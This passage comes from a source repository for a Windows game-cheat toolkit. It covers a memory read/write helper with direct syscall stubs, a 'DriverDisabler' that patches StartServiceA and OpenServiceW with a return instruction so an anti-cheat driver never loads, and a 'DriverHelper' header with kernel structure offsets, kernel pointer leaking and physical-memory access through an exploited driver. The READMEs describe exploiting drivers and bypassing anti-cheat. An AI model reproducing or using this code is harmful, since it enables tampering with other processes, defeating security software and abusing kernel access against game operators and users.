ZwWVMBuffer[BUFSIZE]; 97 | static SIZE_T RPMBufferSize; 98 | static SIZE_T WPMBufferSize; 99 | static SIZE_T ntRVMBufferSize; 100 | static SIZE_T ntWVMBufferSize; 101 | static SIZE_T ZwRVMBufferSize; 102 | static SIZE_T ZwWVMBufferSize; 103 | 104 | //Shared Memory 105 | //static LPCSTR sPipeName; 106 | 107 | //Strings 108 | static char targetProc[BUFSIZE]; 109 | static char privotProc[BUFSIZE]; 110 | static char namedPipeName[BUFSIZE]; 111 | static char fileMapName[BUFSIZE]; 112 | static char driverName[BUFSIZE]; 113 | 114 | 115 | }; 116 | 117 | 118 | 119 | class NamedPipeHelper 120 | { 121 | public: 122 | // NamedPipe functions 123 | int StartPipe(LPTSTR name); 124 | int ConnectPipe(LPTSTR name); 125 | PVOID ListenPipe(); 126 | int WritePipe(const char * buffer); 127 | 128 | 129 | private: 130 | HANDLE hPipeServer; 131 | HANDLE hNamedPipe; 132 | }; 133 | 134 | -------------------------------------------------------------------------------- /CheatHelper/CheatHelper.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {A080C117-D1DB-4671-8217-65496573BA4D} 24 | Win32Proj 25 | CheatHelper 26 | 10.0.17763.0 27 | 28 | 29 | 30 | StaticLibrary 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | StaticLibrary 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | StaticLibrary 44 | true 45 | v141 46 | MultiByte 47 | 48 | 49 | StaticLibrary 50 | false 51 | v141 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | true 76 | 77 | 78 | true 79 | 80 | 81 | false 82 | 83 | 84 | false 85 | 86 | 87 | 88 | NotUsing 89 | Level3 90 | Disabled 91 | true 92 | WIN32;_DEBUG;_LIB;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) 93 | true 94 | 95 | 96 | Windows 97 | true 98 | 99 | 100 | 101 | 102 | NotUsing 103 | Level3 104 | Disabled 105 | true 106 | _DEBUG;_LIB;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) 107 | true 108 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 109 | 110 | 111 | Windows 112 | true 113 | 114 | 115 | 116 | 117 | Use 118 | Level3 119 | MaxSpeed 120 | true 121 | true 122 | true 123 | WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions) 124 | true 125 | 126 | 127 | Windows 128 | true 129 | true 130 | true 131 | 132 | 133 | 134 | 135 | NotUsing 136 | Level3 137 | MaxSpeed 138 | true 139 | true 140 | true 141 | _CRT_SECURE_NO_WARNINGS;NDEBUG;_LIB;%(PreprocessorDefinitions) 142 | true 143 | 144 | 145 | Windows 146 | true 147 | true 148 | true 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | Create 160 | Create 161 | Create 162 | Create 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | -------------------------------------------------------------------------------- /CheatHelper/CheatHelper.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | 37 | 38 | Source Files 39 | 40 | 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /CheatHelper/Readme.md: -------------------------------------------------------------------------------- 1 | # CheatHelper 2 | 3 | ## Introduction 4 | 5 | 6 | ## Usage 7 | 8 | This module provides all key features required by a cheat in order to interact with the Windows API, Memory, NamedPipes and FileMapping. 9 | 10 | ## Key Features 11 | 12 | Class NamedPipeHelper will provide assistance for NamedPipe interaction. 13 | 14 | Class CheatHelper will provide the following method: 15 | 16 | - WINAPI Functions 17 | - static void Suspend(DWORD processId); 18 | - static void Resume(DWORD processId); 19 | - Process Functions 20 | - static DWORD GetProcId(char* procName); 21 | - Debuging Functions 22 | - static void ConsoleSetup(const char * title); 23 | - static void PrintBytes(PVOID buffer, SIZE_T nSize); 24 | - Memory functions 25 | - static int RPM(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead); 26 | - static int WPM(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten); 27 | - static int NtRVM(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded); 28 | - static int NtWVM(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten); 29 | - static int ZwRVM(HANDLE hProc, PVOID pBaseAddress, PVOID pBuffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded); 30 | - static int ZwWVM(HANDLE hProc, PVOID pBaseAddress, PVOID pBuffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten); 31 | - FileMapping 32 | - static bool checkSpinLockByte(LPVOID pFileMapMem, BYTE value); 33 | - static bool setSpinLockByte(LPVOID pFileMapMem, BYTE value); 34 | - static void prepareRequest(PipeMessageRequest &PMRequest); 35 | - Configuration file (INI) 36 | - static bool loadConfig(); 37 | 38 | -------------------------------------------------------------------------------- /CheatHelper/ZwReadWriteVM.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | ZwWriteVM proc 4 | mov r10, rcx 5 | mov eax, 3Ah 6 | syscall 7 | ret 8 | ZwWriteVM endp 9 | 10 | ZwReadVM proc 11 | mov r10, rcx 12 | mov eax, 3Fh 13 | syscall 14 | ret 15 | ZwReadVM endp 16 | 17 | end -------------------------------------------------------------------------------- /CheatHelper/stdafx.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | -------------------------------------------------------------------------------- /CheatHelper/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | 12 | 13 | 14 | // reference additional headers your program requires here 15 | -------------------------------------------------------------------------------- /CheatHelper/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /DriverDisabler/DriverDisabler.cpp: -------------------------------------------------------------------------------- 1 | // DriverDisabler.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include "pch.h" 5 | #include "CheatHelper.h" 6 | #include 7 | #include 8 | 9 | 10 | bool DriverBypass(int pID) 11 | { 12 | HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pID); 13 | if (!hProcess) { 14 | std::cout << "Error1" << std::endl; 15 | return false; 16 | } 17 | 18 | 19 | HMODULE hMod = GetModuleHandle("advapi32.dll"); 20 | if (!hMod) { 21 | std::cout << "Error2" << std::endl; 22 | return false; 23 | } 24 | 25 | 26 | std::cout << std::hex << hMod << std::endl; 27 | LPVOID dwSSA = (LPVOID)GetProcAddress(hMod, "StartServiceA"); 28 | LPVOID dwOSW = (LPVOID)GetProcAddress(hMod, "OpenServiceW"); 29 | if (!dwSSA || !dwOSW) { 30 | std::cout << "Error3" << std::endl; 31 | return false; 32 | } 33 | std::cout << std::hex << dwSSA << std::endl; 34 | std::cout << std::hex << dwOSW << std::endl; 35 | byte wByte[] = { 0xC2, 0x0C, 0x00 }; 36 | if (!WriteProcessMemory(hProcess, dwSSA, &wByte, sizeof(wByte), NULL)) { 37 | std::cout << "Error4" << std::endl; 38 | return false; 39 | } 40 | if (!WriteProcessMemory(hProcess, dwOSW, &wByte, sizeof(wByte), NULL)) { 41 | std::cout << "Error5" << std::endl; 42 | return false; 43 | } 44 | 45 | return true; 46 | } 47 | 48 | 49 | int main() 50 | { 51 | std::cout << "[+] Init" << std::endl; 52 | 53 | DWORD processID = NULL; 54 | while (true) 55 | { 56 | processID = CheatHelper::GetProcId(CheatHelper::targetProc); 57 | if (processID != NULL) 58 | { 59 | std::cout << std::hex << processID << std::endl; 60 | break; 61 | } 62 | Sleep(1000); 63 | } 64 | Sleep(1000); 65 | DriverBypass(processID); 66 | } 67 | 68 | // Run program: Ctrl + F5 or Debug > Start Without Debugging menu 69 | // Debug program: F5 or Debug > Start Debugging menu 70 | 71 | // Tips for Getting Started: 72 | // 1. Use the Solution Explorer window to add/manage files 73 | // 2. Use the Team Explorer window to connect to source control 74 | // 3. Use the Output window to see build output and other messages 75 | // 4. Use the Error List window to view errors 76 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 77 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 78 | -------------------------------------------------------------------------------- /DriverDisabler/DriverDisabler.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {723D6B45-EEBA-4C09-8528-4373BAFF330A} 24 | Win32Proj 25 | DriverDisabler 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | MultiByte 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | NotUsing 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 95 | 96 | 97 | Console 98 | true 99 | $(SolutionDir)Debug\CheatHelper.lib;%(AdditionalLibraryDirectories) 100 | 101 | 102 | 103 | 104 | Use 105 | Level3 106 | Disabled 107 | true 108 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 109 | true 110 | pch.h 111 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 112 | 113 | 114 | Console 115 | true 116 | %(AdditionalDependencies) 117 | $(VCInstallDir)lib;C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Tools\MSVC\14.16.27023\lib\onecore\x64;%(AdditionalLibraryDirectories) 118 | 119 | 120 | 121 | 122 | Use 123 | Level3 124 | MaxSpeed 125 | true 126 | true 127 | true 128 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 129 | true 130 | pch.h 131 | 132 | 133 | Console 134 | true 135 | true 136 | true 137 | 138 | 139 | 140 | 141 | NotUsing 142 | Level3 143 | MaxSpeed 144 | true 145 | true 146 | true 147 | _CRT_SECURE_NO_WARNINGS;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 148 | true 149 | pch.h 150 | $(SolutionDir)CheatHelper;%(AdditionalIncludeDirectories) 151 | 152 | 153 | Console 154 | true 155 | true 156 | true 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | Create 166 | Create 167 | Create 168 | Create 169 | 170 | 171 | 172 | 173 | {a080c117-d1db-4671-8217-65496573ba4d} 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | -------------------------------------------------------------------------------- /DriverDisabler/DriverDisabler.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /DriverDisabler/README.md: -------------------------------------------------------------------------------- 1 | # DriverDisabler 2 | 3 | ## Introduction 4 | 5 | 6 | ## Usage 7 | 8 | This Module will inject a "return" on the methods StartServiceA and OpenServiceW in order to prevent to the anti-cheat to load the driver. 9 | 10 | Some Anti-Cheat (AC) load their service/driver from within the game. By injecting a return the method will get executed but no service will be started. 11 | 12 | This module can be easily adapted to disable AC services that are started by using different methods. 13 | 14 | ## Configuration 15 | 16 | This module does not requires much configuration, compile for the required architecture (x86/x64) and inject it. 17 | 18 | **targetProc** need to be provided by usign config.ini file. 19 | 20 | ## Combination with other techniques 21 | 22 | - Run this before the Anti-cheat is loaded completely. 23 | -------------------------------------------------------------------------------- /DriverDisabler/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /DriverDisabler/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /DriverHelper/DriverHelper.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | #pragma comment( lib, "ntdll.lib" ) 10 | 11 | // IMPORTANT!!! You need to set up this constant to the windows version 12 | // you are going to compile it for. 13 | #define WINVERSION 1607 14 | 15 | // Kernel offsets (used for Read Write kernel memory) 16 | #define OFFSET_DIRECTORYTABLEBASE 0x028 17 | #define OFFSET_VIRTUALSIZE 0x338 18 | #define OFFSET_SECTIONBASEADDRESS 0x3c0 19 | #define OFFSET_OBJECTTABLE 0x418 20 | #define OFFSET_IMAGEFILENAME 0x450 21 | #define OFFSET_PRIORITYCLASS 0x45f 22 | 23 | // Kernel offsets (used for enumerate modules and sections of a process using kernel memory) w10 1607 24 | #define OFFSET_EPROCESS_PEB 0x3f8 25 | #define OFFSET_PEB_LDR 0x018 26 | #define OFFSET_LDR_InMemoryOrderModuleList 0x20 27 | 28 | #if (WINVERSION == 1607) 29 | #define OFFSET_ACTIVEPROCESSLINKS 0x2f0 30 | #define OFFSET_UNIQUEPROCESSID 0x2e8 31 | #define OFFSET_VADROOT 0x620 32 | #endif 33 | 34 | 35 | #if (WINVERSION == 1703 || WINVERSION == 1709) 36 | #define OFFSET_ACTIVEPROCESSLINKS 0x2e8 37 | #define OFFSET_UNIQUEPROCESSID 0x2e0 38 | #define OFFSET_VADROOT 0x628 39 | #endif 40 | 41 | 42 | 43 | /* 44 | (*((ntkrnlmp!_MMVAD_SHORT *)0xffffb803e0fa73a0)) [Type: _MMVAD_SHORT] 45 | [+0x000] VadNode [Type: _RTL_BALANCED_NODE] 46 | [+0x000] NextVad : 0xffffb803dfc39240 [Type: _MMVAD_SHORT *] 47 | [+0x018] StartingVpn : 0x96ee040 [Type: unsigned long] 48 | [+0x01c] EndingVpn : 0x96ee13f [Type: unsigned long] 49 | [+0x020] StartingVpnHigh : 0x0 [Type: unsigned char] 50 | [+0x021] EndingVpnHigh : 0x0 [Type: unsigned char] 51 | 52 | */ 53 | #define OFFSET_STARTINGVPN 0x018 54 | #define OFFSET_ENDINGVPN 0x01c 55 | #define OFFSET_STARTINGVPNHIGH 0x020 56 | #define OFFSET_ENDINGVPNHIGH 0x021 57 | #define OFFSET_MMVAD_SHORT_U 0x030 58 | 59 | 60 | const ULONG ProtectionFlags[] = { 61 | PAGE_NOACCESS, 62 | PAGE_READONLY, 63 | PAGE_EXECUTE, 64 | PAGE_EXECUTE_READ, 65 | PAGE_READWRITE, 66 | PAGE_WRITECOPY, 67 | PAGE_EXECUTE_READWRITE, 68 | PAGE_EXECUTE_WRITECOPY, 69 | PAGE_NOACCESS, 70 | PAGE_NOCACHE | PAGE_READONLY, 71 | PAGE_NOCACHE | PAGE_EXECUTE, 72 | PAGE_NOCACHE | PAGE_EXECUTE_READ, 73 | PAGE_NOCACHE | PAGE_READWRITE, 74 | PAGE_NOCACHE | PAGE_WRITECOPY, 75 | PAGE_NOCACHE | PAGE_EXECUTE_READWRITE, 76 | PAGE_NOCACHE | PAGE_EXECUTE_WRITECOPY, 77 | PAGE_NOACCESS, 78 | PAGE_GUARD | PAGE_READONLY, 79 | PAGE_GUARD | PAGE_EXECUTE, 80 | PAGE_GUARD | PAGE_EXECUTE_READ, 81 | PAGE_GUARD | PAGE_READWRITE, 82 | PAGE_GUARD | PAGE_WRITECOPY, 83 | PAGE_GUARD | PAGE_EXECUTE_READWRITE, 84 | PAGE_GUARD | PAGE_EXECUTE_WRITECOPY, 85 | PAGE_NOACCESS, 86 | PAGE_WRITECOMBINE | PAGE_READONLY, 87 | PAGE_WRITECOMBINE | PAGE_EXECUTE, 88 | PAGE_WRITECOMBINE | PAGE_EXECUTE_READ, 89 | PAGE_WRITECOMBINE | PAGE_READWRITE, 90 | PAGE_WRITECOMBINE | PAGE_WRITECOPY, 91 | PAGE_WRITECOMBINE | PAGE_EXECUTE_READWRITE, 92 | PAGE_WRITECOMBINE | PAGE_EXECUTE_WRITECOPY, 93 | }; 94 | 95 | 96 | typedef BOOL (*_fn_memcpy)(ULONG64 dest, ULONG64 src, DWORD size); 97 | typedef ULONG64(*_fn_mapPhysical)(DWORDLONG physicaladdress, DWORD size); 98 | typedef ULONG64(*_fn_unmapPhysical)(ULONG64 address); 99 | 100 | // Remove padding inside structs 101 | #pragma pack(push, 1) 102 | typedef struct { 103 | CHAR ImageFileName[15]; 104 | DWORD PriorityClass; 105 | } _EPROCESS_PATTERN; 106 | 107 | 108 | // Structure of MAP 109 | typedef struct _READ_REQUEST { 110 | DWORD InterfaceType; 111 | DWORD Bus; 112 | ULONG64 PhysicalAddress; 113 | DWORD IOSpace; 114 | DWORD size; 115 | } READ_REQUEST; 116 | 117 | typedef struct _WRITE_REQUEST { 118 | DWORDLONG address; 119 | DWORD length; 120 | DWORDLONG buffer; 121 | } WRITE_REQUEST; 122 | 123 | typedef struct _MEMCPY_REQUEST { 124 | ULONG64 dest; 125 | ULONG64 src; 126 | DWORD size; 127 | } MEMCPY_REQUEST; 128 | 129 | 130 | 131 | // Kernel Structures 132 | typedef struct _HANDLE_TABLE_ENTRY 133 | { 134 | ULONGLONG Value; 135 | ULONGLONG GrantedAccess : 25; 136 | } HANDLE_TABLE_ENTRY, *PHANDLE_TABLE_ENTRY; 137 | 138 | typedef struct _HANDLE_TABLE 139 | { 140 | CHAR fill[100]; 141 | } HANDLE_TABLE, *PHANDLE_TABLE; 142 | 143 | 144 | struct SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX // Size => 28 145 | { 146 | PVOID Object; // Size => 4 Offset =>0 147 | ULONG UniqueProcessId; // Size => 4 Offset =>4 148 | ULONG HandleValue; // Size => 4 Offset =>8 149 | ULONG GrantedAccess; // Size => 4 Offset =>12 150 | USHORT CreatorBackTraceIndex; // Size => 2 Offset =>16 151 | USHORT ObjectTypeIndex; // Size => 2 Offset =>18 152 | ULONG HandleAttributes; // Size => 4 Offset =>20 153 | ULONG Reserved; // Size => 4 Offset =>24 154 | }; 155 | 156 | struct SYSTEM_HANDLE_INFORMATION_EX // Size => 36 157 | { 158 | ULONG NumberOfHandles; // Size => 4 Offset => 0 159 | ULONG Reserved; // Size => 4 Offset => 4 160 | SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1]; // Size => 36 Offset => 8 161 | }; 162 | 163 | 164 | typedef struct _LDR_MODULE 165 | { 166 | LIST_ENTRY InLoadOrderModuleList; 167 | LIST_ENTRY InMemoryOrderModuleList; 168 | LIST_ENTRY InInitializationOrderModuleList; 169 | PVOID BaseAddress; 170 | PVOID EntryPoint; 171 | ULONG SizeOfImage; 172 | UNICODE_STRING FullDllName; 173 | UNICODE_STRING BaseDllName; 174 | ULONG Flags; 175 | SHORT LoadCount; 176 | SHORT TlsIndex; 177 | LIST_ENTRY HashTableEntry; 178 | ULONG TimeDateStamp; 179 | } LDR_MODULE, *PLDR_MODULE; 180 | 181 | 182 | // Custom structs from ReClass (this is the information we store from each section/module) 183 | const int PATH_MAXIMUM_LENGTH = 260; 184 | using RC_Pointer = void*; 185 | using RC_Size = size_t; 186 | using RC_UnicodeChar = char16_t; 187 | 188 | enum class SectionProtection 189 | { 190 | NoAccess = 0, 191 | 192 | Read = 1, 193 | Write = 2, 194 | CopyOnWrite = 4, 195 | Execute = 8, 196 | 197 | Guard = 16 198 | }; 199 | 200 | inline SectionProtection operator|(SectionProtection lhs, SectionProtection rhs) 201 | { 202 | using T = std::underlying_type_t; 203 | 204 | return static_cast(static_cast(lhs) | static_cast(rhs)); 205 | } 206 | 207 | inline SectionProtection& operator|=(SectionProtection& lhs, SectionProtection rhs) 208 | { 209 | using T = std::underlying_type_t; 210 | 211 | lhs = static_cast(static_cast(lhs) | static_cast(rhs)); 212 | 213 | return lhs; 214 | } 215 | 216 | 217 | struct EnumerateRemoteSectionData 218 | { 219 | RC_Pointer BaseAddress; 220 | RC_Size Size; 221 | //SectionType Type; 222 | //SectionCategory Category; 223 | SectionProtection Protection; 224 | RC_UnicodeChar Name[16]; 225 | RC_UnicodeChar ModulePath[PATH_MAXIMUM_LENGTH]; 226 | }; 227 | 228 | struct EnumerateRemoteModuleData 229 | { 230 | RC_Pointer BaseAddress; 231 | RC_Size Size; 232 | RC_UnicodeChar Path[PATH_MAXIMUM_LENGTH]; 233 | }; 234 | 235 | 236 | class DriverHelper 237 | { 238 | public: 239 | static int memmem(PBYTE haystack, DWORD haystack_size, PBYTE needle, DWORD needle_size); 240 | static int getDeviceHandle(LPTSTR name); 241 | static unsigned __int64 __fastcall ExpLookupHandleTableEntryW7(__int64 HandleTable, unsigned __int64 handle); 242 | static unsigned __int64 __fastcall ExpLookupHandleTableEntryW10(__int64 HandleTable, __int64 handle); 243 | static ULONG64 findPhisical_ObjectTable(DWORDLONG startAddress, DWORDLONG stopAddress, DWORD searchSpace, PBYTE searchBuffer, DWORD bufferSize); 244 | static DWORDLONG findPhisical(DWORDLONG startAddress, DWORDLONG stopAddress, DWORD searchSpace, PBYTE searchBuffer, DWORD bufferSize); 245 | static bool LeakKernelPointers(std::vector &pKernelPointers); 246 | static uintptr_t FindDirectoryBase(); 247 | static uint64_t VAtoPhylAddress(uint64_t directoryTableBase, LPVOID virtualAddress); 248 | static bool ReadVirtualMemory(uint64_t directoryTableBase, uintptr_t virtualAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead); 249 | static bool WriteVirtualMemory(uint64_t directoryTableBase, uintptr_t virtualAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten); 250 | static uintptr_t ObtainKProcessPointer(uint64_t directoryTableBase, std::vector pKernelPointers); 251 | static uintptr_t GetKProcess(uintptr_t &directoryTableBase); 252 | static uintptr_t SearchKProcess(LPCVOID processName, uintptr_t &directoryTableBase, uintptr_t pKProcess); 253 | static bool ReadPhyMemory( uintptr_t physicalAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead); 254 | static bool WritePhyMemory( uintptr_t physicalAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten); 255 | static bool CheckProcessHeader(uintptr_t &directoryTableBase, uintptr_t pKProcessAddress); 256 | static bool ObtainKProcessInfo(uintptr_t &directoryTableBase, uintptr_t pKProcessAddress); 257 | // Developed for DriverReader (ReClass Plugin) 258 | static void WalkVadAVLTree(uintptr_t directoryTableBase, uintptr_t start); 259 | static void EnumRing3ProcessModules(uintptr_t directoryTableBase); 260 | 261 | 262 | // Variables 263 | static HANDLE hDeviceDrv; 264 | static _fn_memcpy fn_memcpy; 265 | static _fn_mapPhysical fn_mapPhysical; 266 | static _fn_unmapPhysical fn_unmapPhysical; 267 | static uintptr_t DTBTargetProcess; 268 | static uintptr_t virtualSizeTargetProcess; 269 | static uintptr_t pBaseAddressTargetProcess; 270 | 271 | // Developed for DriverReader (ReClass Plugin) 272 | static uintptr_t pVadRootTargetProcess; 273 | static uintptr_t pPEBTargetProcess; 274 | static std::vector sections; 275 | static std::vector modules; 276 | 277 | private: 278 | 279 | }; -------------------------------------------------------------------------------- /DriverHelper/DriverHelper.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {36244BA2-D910-4746-8ED2-7CFA55FB4DE9} 24 | Win32Proj 25 | DriverHelper 26 | 10.0.17763.0 27 | 28 | 29 | 30 | StaticLibrary 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | StaticLibrary 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | StaticLibrary 44 | true 45 | v141 46 | MultiByte 47 | 48 | 49 | StaticLibrary 50 | false 51 | v141 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | NotUsing 88 | Level3 89 | Disabled 90 | true 91 | _DEBUG;_LIB;%(PreprocessorDefinitions) 92 | true 93 | $(SolutionDir)DriverHelper;%(AdditionalIncludeDirectories) 94 | 95 | 96 | Windows 97 | true 98 | 99 | 100 | 101 | 102 | NotUsing 103 | Level3 104 | Disabled 105 | true 106 | WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions) 107 | true 108 | 109 | 110 | Windows 111 | true 112 | 113 | 114 | 115 | 116 | Use 117 | Level3 118 | MaxSpeed 119 | true 120 | true 121 | true 122 | WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions) 123 | true 124 | 125 | 126 | Windows 127 | true 128 | true 129 | true 130 | 131 | 132 | 133 | 134 | NotUsing 135 | Level3 136 | MaxSpeed 137 | true 138 | true 139 | true 140 | _CRT_SECURE_NO_WARNINGS;NDEBUG;_LIB;%(PreprocessorDefinitions) 141 | true 142 | 143 | 144 | Windows 145 | true 146 | true 147 | true 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | Create 159 | Create 160 | Create 161 | Create 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | -------------------------------------------------------------------------------- /DriverHelper/DriverHelper.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /DriverHelper/Readme.md: -------------------------------------------------------------------------------- 1 | # DriverHelper 2 | 3 | ## Introduction 4 | 5 | 6 | ## Usage 7 | 8 | This module provides all key features required to exploit and communicate with a Driver. 9 | 10 | ## Key Features 11 | 12 | Class 